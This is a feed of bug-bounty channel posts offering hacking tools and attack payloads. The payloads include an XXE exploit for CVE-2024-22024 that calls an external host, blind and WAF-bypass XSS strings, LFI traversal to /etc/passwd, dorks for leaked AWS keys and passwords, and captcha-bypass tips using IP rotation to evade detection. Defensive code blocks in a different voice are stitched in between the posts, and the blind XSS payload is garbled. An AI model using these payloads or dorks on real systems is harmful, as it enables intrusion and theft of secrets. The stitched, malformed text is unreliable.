CyberSec Playground | Learn ethical hacking ⚡️
Welcome to CyberSec Playground! A community to learn, explore, and master penetration testing and bug bounty, ethical hacking, and all things cybersecurity.
Backup : https://t.me/fatherofbits
cybersecplayground.com
#BugBounty #Hacking
AungRecon

AungRecon is a comprehensive, automated reconnaissance script for web application security assessments. It performs multiple security checks and scans on a target domain, including subdomain enumeration, SQL injection, XSS, open redirects, LFI vulnerabilities, and more. The tool integrates several popular security tools, streamlining the workflow of security analysts and penetration testers.

Features:
WhatWeb Scan: Identifies technologies, plugins, and versions used by the target website.
Subdomain Enumeration: Discovers and filters alive subdomains.
Subdomain Takeover Detection: Identifies possible subdomain takeovers.
SQL Injection Detection: Searches for SQLi vulnerabilities using parameterized URLs.
Cross-Site Scripting (XSS) Detection: Scans for XSS vulnerabilities.
Open Redirect Detection: Finds possible open redirect vulnerabilities.
Local File Inclusion (LFI) Detection: Identifies possible LFI vulnerabilities.
Nuclei Vulnerability Scans: Executes multiple vulnerability templates via Nuclei.

Link:
https://github.com/aungsanoo-usa/aungrecon?tab=readme-ov-file

Installation:
Clone the repository:
git clone https://github.com/aungsanoo-usa/aungrecon.git
cd aungrecon
chmod +x install.sh
chmod +x aungrecon.sh

Usage: To run AungRecon on a target domain, simply execute the script with the following command:
./install.sh
./aungrecon.sh
Injectra: Payload Injection via File Magic Numbers

Injectra is a robust tool designed for injecting custom payloads into files based on their magic numbers. By leveraging this technique, Injectra modifies files for penetration testing and security research purposes. The tool detects the file type by analyzing its magic numbers and injects the payload seamlessly into the correct position.

Features
- Magic Number-Based Payload Injection: Identifies file types using magic numbers and injects payloads precisely into their headers.

- Customizable Payloads: Supports user-defined payloads, with a default PHP-based payload for command execution.

- Broad File Type Support: Compatible with file types like zip, rar, docx, jpg, png, pdf, and more.

- Interactive CLI: Includes features like auto-completion for file paths and detailed prompts to guide users.

- Dependency Management: Automatically checks and installs required Python packages.

https://github.com/AnonKryptiQuz/Injectra

#tools #payload #injection
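As an added defensive example (not Injectra's code and not from the original post), a server-side upload check of the kind that catches the header-injection trick described above: the declared extension must match the file's magic number, and the body is scanned for the PHP tag that the default payload would carry. The MAGIC table and the checkUpload name are chosen here; the signatures are the public file-format ones, and the sample files in the test are constructed.

```javascript
// Public magic numbers for the file types the post lists (OOXML docx/xlsx are zip).
const MAGIC = {
  png: Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]),
  jpg: Buffer.from([0xff, 0xd8, 0xff]),
  pdf: Buffer.from('%PDF-'),
  zip: Buffer.from([0x50, 0x4b, 0x03, 0x04]),
  rar: Buffer.from([0x52, 0x61, 0x72, 0x21, 0x1a, 0x07]),
};
const EXT_ALIAS = { jpeg: 'jpg', docx: 'zip', xlsx: 'zip' };

// Heuristic marker for a PHP-style payload hidden inside an otherwise valid file.
// It is a signal, not a proof; the robust control is never executing uploads.
const PHP_MARKER = /<\?(php\b|=)/i;

// Returns { ok, type } or { ok: false, reason } for a filename and its raw bytes.
function checkUpload(filename, data) {
  const raw = (filename.split('.').pop() || '').toLowerCase();
  const ext = EXT_ALIAS[raw] || raw;
  if (!(ext in MAGIC)) return { ok: false, reason: 'extension not allowed' };
  const sig = MAGIC[ext];
  if (data.length < sig.length || !data.subarray(0, sig.length).equals(sig)) {
    return { ok: false, reason: 'magic number does not match extension' };
  }
  if (PHP_MARKER.test(data.toString('latin1'))) {
    return { ok: false, reason: 'embedded script marker found' };
  }
  return { ok: true, type: ext };
}
```

Store accepted files outside the web root and re-encode images server-side; the magic check alone only guarantees the header, not the rest of the file.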
Finding the real IP behind Cloudflare has never been so easy. Here is a tool to search Shodan starting from a simple favicon:

- https://github.com/pielco11/fav-up

#infosec #cybersec #bugbountytips
Quick and dirty way to find parameters vulnerable to LFI & Path Traversal & SSRF & Open Redirect:

Burp Search > Regex
\?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w])

And find potentially vulnerable SSRF params

- https://github.com/In3tinct/See-SURF

A Python-based scanner to find potential SSRF parameters in a web application. See-SURF helps you detect potential SSRF parameters and validates the finding by making a DNS/HTTP request back to your server. It can be added to your arsenal of recon while doing bug hunting/web security testing.

#SSRF #cybersec #lfi
CVE-2024-22024, XXE on Ivanti Connect Secure

Payload (encode it to base64):

<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>

Send it to 127.0.0.1/dana-na/auth/saml-sso.cgi in the SAMLRequest parameter.

#bugbountytips #cve #infosec
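An added defensive example, not from the post or from Ivanti: the payload above only fires if the SAMLRequest reaches a parser that processes DTDs, so a SAML endpoint can decode the base64 and refuse anything carrying a `<!DOCTYPE` or `<!ENTITY` declaration before it is parsed. screenSamlRequest and the sample inputs are constructed for this example; `{{external-host}}` is kept as the post's own placeholder.

```javascript
// Any DTD is refused outright: SAML messages never legitimately need one, and
// both internal and external entity tricks depend on a DOCTYPE being present.
const DTD_PATTERN = /<!(DOCTYPE|ENTITY)\b/i;

// Takes the raw base64 SAMLRequest value and returns either the decoded XML
// (safe to hand to a parser with DTD processing disabled) or a rejection reason.
function screenSamlRequest(b64) {
  if (typeof b64 !== 'string' || b64.length === 0) {
    return { ok: false, reason: 'missing SAMLRequest' };
  }
  const xml = Buffer.from(b64, 'base64').toString('utf8');
  if (!xml.trimStart().startsWith('<')) return { ok: false, reason: 'not XML' };
  if (DTD_PATTERN.test(xml)) return { ok: false, reason: 'DTD not allowed' };
  return { ok: true, xml };
}

// Constructed inputs: the shape of the post's payload, and a minimal benign request.
const XXE_PAYLOAD =
  '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM ' +
  '"http://{{external-host}}/x"> %xxe;]><r></r>';
const BENIGN_REQUEST =
  '<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_1"/>';
const encode = (s) => Buffer.from(s, 'utf8').toString('base64');
```

This screen is a first gate; the parser that consumes the accepted XML must still have external entity and DTD loading disabled, since an attacker-controlled document can arrive by other paths.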
⚠️ Alert
CVE-2025-0070 and CVE-2025-0066 : Two Critical Vulnerabilities in NetWeaver AS for ABAP and ABAP Platform

📊 3.2K+ services are found on hunter.how yearly.

🔗 Hunter link: hunter.how/list?searchVal…

👇 Query
HUNTER: product.name="SAP NetWeaver AS for ABAP"

Refer: securityonline.info/critical-sap-f…

#hunterhow #infosec #infosecurity #OSINT #Vulnerability
⚠️ Alert

CVE-2024-55591 : Zero-Day Vulnerability in Attacks on Fortinet Firewalls with Exposed Interfaces

🔗 Hunter link: hunter.how/list?searchVal…

👇 Query
HUNTER: product.name="Fortinet Firewall"
FOFA: product="FORTINET-Firewall"

📰 Refer: securityonline.info/active-exploit…

#FORTINET #hunterhow #infosec #infosecurity #OSINT #fofa #Vulnerability #zeroday
Blind XSS in Private crypto target
Payload used:

"><iframesrcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;#116;&#116;&#112;&#115;&#58;&#47;&#47;test.bxss.in&#34;&#59;&#117;&#109;&#101;&#110;&#116;&#46;&#62;">

#bugbountytips #bugbounty #payload
Bypass Cloudflare WAF (DOM-based XSS) ♻️

Payload:
'-alert?.(1)-'

writeup: 1337.or.id/post/stored-do…

#infosec #cybersec #bugbountytips
🐞 Bug Bounty Tip:

If you find Web frameworks like Symfony, add /app_dev.php/_profiler/open?file=app/config/parameters.yml to the wordlist, and you may get juicy data.

#bugbountytips #tips #cybersec #bugbounty
Uncover sensitive info with: inurl:notepad.link + keyword

Some example keywords:
aws_secret_access_key, "username=" "password=", VISA, PRIVATE KEY, "authToken="

More cool unpublished Dorks:

http://github.com/fatguru/dorks

#bugbountytip
⚡️ XSS Payload

Payload:
1%27;--<img%20src=x%20onerror=javascript:alert(document.domain)>

#bugbountytips #xss #bugbounty #infosec #cybersec
🔖Top 25 JavaScript path files used to store sensitive information in Web Application⬇️

01. /js/config.js
02. /js/credentials.js
03. /js/secrets.js
04. /js/keys.js
05. /js/password.js
06. /js/api_keys.js
07. /js/auth_tokens.js
08. /js/access_tokens.js
09. /js/sessions.js
10. /js/authorization.js
11. /js/encryption.js
12. /js/certificates.js
13. /js/ssl_keys.js
14. /js/passphrases.js
15. /js/policies.js
16. /js/permissions.js
17. /js/privileges.js
18. /js/hashes.js
19. /js/salts.js
20. /js/nonces.js
21. /js/signatures.js
22. /js/digests.js
23. /js/tokens.js
24. /js/cookies.js
25. /js/topsecr3tdonotlook.js

#InfoSec #CyberSecurity #Hacking #BugBounty #bugbountyTools #bugbountytips #Pentest #Fuzzing
Plution is a convenient way to scan at scale for pages that are vulnerable to client side prototype pollution via a URL payload. In the default configuration, it will use a hardcoded payload that can detect 11 of the cases documented

⬇️ LINK:
- https://github.com/raverrr/plution

How to use:

Basic scan, output only to screen:
cat URLs.txt | plution

Scan with a supplied payload rather than hardcoded one:

cat URLs.txt|plution -p '__proto__.zzzc=example'

Note on custom payloads: The variable you are hoping to inject must be called or render to "zzzc". This is because 'window.zzzc' will be run on each page to verify pollution.

Output:

Passing '-o' followed by a location will output only URLs of pages that were successfully polluted.

Concurrency:

Pass the '-c' option to specify how many concurrent jobs are run (default is 5).

#infosec #cybersec #bugbountytips
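An added example, not plution's own code, showing what the default payload `__proto__.zzzc=example` does when a page merges URL parameters with a naive dotted-key setter, the `window.zzzc` style probe plution relies on to confirm pollution, and a hardened setter that refuses prototype-chain keys. naiveSetPath, safeSetPath and applyPayload are names chosen here.

```javascript
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Naive setter: walks "a.b.c" into nested objects. On "__proto__.zzzc" the first
// hop lands on Object.prototype, so the final write is inherited by every object.
function naiveSetPath(target, path, value) {
  const keys = path.split('.');
  let cur = target;
  for (let i = 0; i < keys.length - 1; i++) {
    if (cur[keys[i]] === null || typeof cur[keys[i]] !== 'object') cur[keys[i]] = {};
    cur = cur[keys[i]];
  }
  cur[keys[keys.length - 1]] = value;
}

// Hardened setter: rejects prototype-chain keys and only descends into own properties.
function safeSetPath(target, path, value) {
  const keys = path.split('.');
  if (keys.some((k) => BLOCKED_KEYS.has(k))) throw new Error(`blocked key in path: ${path}`);
  let cur = target;
  for (let i = 0; i < keys.length - 1; i++) {
    const own = Object.prototype.hasOwnProperty.call(cur, keys[i]);
    if (!own || cur[keys[i]] === null || typeof cur[keys[i]] !== 'object') cur[keys[i]] = {};
    cur = cur[keys[i]];
  }
  cur[keys[keys.length - 1]] = value;
}

// The same probe plution runs as `window.zzzc`: a fresh object inherits the polluted value.
const isPolluted = () => ({}).zzzc === 'example';

// Feed the post's payload through a setter, record whether Object.prototype was
// polluted, then clean up so the rest of the process is unaffected.
function applyPayload(setter, query = '__proto__.zzzc=example') {
  const [path, value] = query.split('=');
  let refused = false;
  try { setter({}, path, value); } catch (e) { refused = true; }
  const polluted = isPolluted();
  delete Object.prototype.zzzc;
  return { polluted, refused };
}
```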
⚠️ Alert ⚠️

CVE-2024-12084(CVSS 9.8) : Heap overflow that could lead to remote code execution

🔗 Hunter link: hunter.how/list?searchVal

👇 Query
HUNTER: product.name="rsync"
FOFA: product="rsync"
SHODAN: product:"rsyncd"

📰 Refer: access.redhat.com/security/cve/C

securityonline.info/cve-2024-12084

sysdig.com/blog/detecting

#RSYNC #hunterhow #infosec #infosecurity #OSINT #Vulnerability
Before intercepting even a single request in Burp, enable the Binary and Images filter in the proxy history. It may help catch directory traversal, for example:

load_image?img=assets/imgs/logo.png with ../../../../../etc/passwd

#infosec #cybersec #bugbountytips
🚀 Captcha Bypass Techniques for Efficient Server Testing 🚀

Bypassing captchas can make server testing and automation easier. It's important to note that this is for testing purposes only, and the goal isn’t to compromise security, but to optimize workflows. Here are some methods to consider:

🔑 1. Parameter Manipulation
Omit Captcha Parameter: Skip the captcha parameter and try switching the HTTP method (e.g., POST → GET) or the data format (form data → JSON).
Submit Empty Captcha: Send the captcha parameter with no value.

🔍 2. Value Extraction & Reuse
Inspect Source Code: Look for captcha values hidden in the page’s source code.
Analyze Cookies: Check cookies for stored captcha values that might be reused.
Reuse Old Captcha: If a captcha was solved successfully, try using the same value. (Note: It may expire.)
Session Manipulation: Try reusing the same captcha value across different sessions or use the same session ID.

🤖 3. Automation & Recognition
Solve Math Captchas: Automate the calculation process for captchas involving simple math.
Image Recognition:
For image-based captchas, identify unique images (use MD5 hashes if limited).
Use OCR (Optical Character Recognition) tools like Tesseract to automate reading characters from images.

⚙️ 4. Additional Techniques
Rate Limit Testing: See if there are submission limits and find ways to bypass or reset them.
Use Third-Party Services: Leverage captcha-solving APIs or services.
Session & IP Rotation: Rotate your session IDs and IP addresses frequently to avoid detection.
User-Agent Manipulation: Change the User-Agent and headers to simulate different browsers or devices.
Audio Captcha Solving: Use speech-to-text services for audio captchas.

💡 Note: These techniques are meant for testing and automating workflows, not for bypassing security measures maliciously. Always ensure your actions are ethical and legal. 🔒

#bypass #Captcha #tricks #hacktricks
🚨 TP-Link Vulnerability CVE-2024-54887: Remote Code Execution 🚨

A critical vulnerability in TP-Link devices (CVE-2024-54887) has been discovered, allowing attackers to remotely execute code. This flaw could expose users to significant security risks if left unaddressed. Here’s everything you need to know:

💡 What is CVE-2024-54887?
This vulnerability affects TP-Link routers and smart home devices, and it allows attackers to exploit a remote code execution (RCE) flaw. If exploited, an attacker can gain full control over the affected device.

⚠️ Risk of Exploitation
Remote Code Execution (RCE): Attackers can remotely run arbitrary code on the device, allowing them to gain control and potentially compromise the entire network.
Full Device Compromise: With RCE, an attacker can steal sensitive data, alter device configurations, or launch further attacks within the local network.
Impact on IoT Devices: The vulnerability affects a range of TP-Link devices, including routers and IoT products, which could be targeted for botnet attacks, espionage, or other malicious activities.

🛠 How Does the Exploit Work?
Exploiting the Vulnerability: Attackers can send specially crafted requests to the affected TP-Link devices, bypassing authentication mechanisms and executing arbitrary commands.
Exploitation via HTTP Requests: The vulnerability is triggered by manipulating HTTP requests to the vulnerable endpoint. Once triggered, it grants the attacker the ability to execute malicious commands on the device.

💥 Proof of Concept (PoC)
Exploiting the Bug: A PoC exploit has been released, demonstrating how easily this vulnerability can be triggered. It shows how an attacker can interact with a vulnerable device remotely and execute arbitrary code.
Code Execution Risk: The PoC highlights how the exploit can bypass authentication and escalate privileges, potentially leading to device takeover and exploitation.

🛡 How to Protect Yourself
Update Your Firmware:
TP-Link has released a patch to fix the vulnerability. Ensure your device is updated to the latest firmware version that addresses CVE-2024-54887.

Disable Remote Management:
Disable remote management features on your TP-Link device if you don’t need them, as this reduces the attack surface for potential exploits.

Network Segmentation:
Use network segmentation to isolate IoT devices from critical systems, making it harder for attackers to move laterally within your network.

Monitor Network Traffic:
Watch for unusual network traffic patterns, especially HTTP requests targeting your device’s IP, which may indicate exploitation attempts.

Use Strong Authentication:
Ensure strong passwords and two-factor authentication (2FA) are enabled for device access, reducing the chance of successful attacks.

📝 Key Takeaway:
The TP-Link vulnerability CVE-2024-54887 poses serious RCE risks to affected devices. Immediate patching, disabling remote management, and securing network access are critical steps to mitigate potential exploitation.

ZoomEye :
app="TP-LINK TL-WR940N WAP httpd"
6k+ results are found on ZoomEye.

ZoomEye Link: https://zoomeye.ai

Refer: https://securityonline.info/

#RCE #Cyberspacemapping #cybersecurity #ZoomEye #infosec2024